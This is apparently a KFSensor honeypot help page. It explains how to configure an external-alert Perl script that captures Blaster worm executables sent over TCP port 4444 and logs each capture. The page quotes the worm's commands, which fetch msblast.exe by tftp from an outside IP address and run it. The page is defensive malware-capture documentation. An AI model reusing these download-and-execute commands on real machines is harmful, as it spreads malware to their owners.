Blaster worm, capture

The page describes how to configure KFSensor to capture a blaster worm executable.

The blaster worm executes a buffer overflow and then binds a shell to TCP port 4444.
The worm then attempts to execute the following commands by sending data to port 4444.

tftp -i 81.132.114.254 GET msblast.exe[0A]
start msblast.exe[0A]
msblast.exe[0A]

Different variants of the worm download a different executable, e.g. teekids.exe and mslaugh.exe.

It is possible to safely download a copy of the worm, for later analysis.
By using a virus checker the worm executable can be identified and there is always the possibility of identifying a new variant

Configuration

The following configuration uses a KFSensor external alert and a PERL script.

1. Download the file blastercapture.zip
2. Unzip the file and extract blastercapture.pl to C:\Program Files\KeyFocus\KFSensor\files\scripts
3. If you do not already have a Listen defined on TCP port 4444 and RCP port 135 then you will need to set these up. This is described in the MS RPC Buffer Overrun and the Blaster worm section of the KFSensor Administration Guide
4. Select the Settings->External Alerts menu item
5. Select the Enable check box
6. Press the Add... button
7. Fill in the details as follows:
   
   The Argument field contains:
   "C:\Program Files\KeyFocus\KFSensor\files\scripts\blastercapture.pl" $eventid
8. Press return twice

Results

Warning
When PERL executes the command tfpt then a console window will appear on the screen as the tftp executes.
This will close automatically then tftp completes its execution.

When a blaster worm connects to TCP port 4444 the data it sends will be captured and the PERL script will download the executable and add the event to its own report file.

The log file is called blasterlog.txt and is a tab separated file containing the following fields; EventID,Time,SourceIP and FileName.

The executable is given the following name: blast_<filename>_<eventid>.bin
e.g. blast_teekids_161090.bin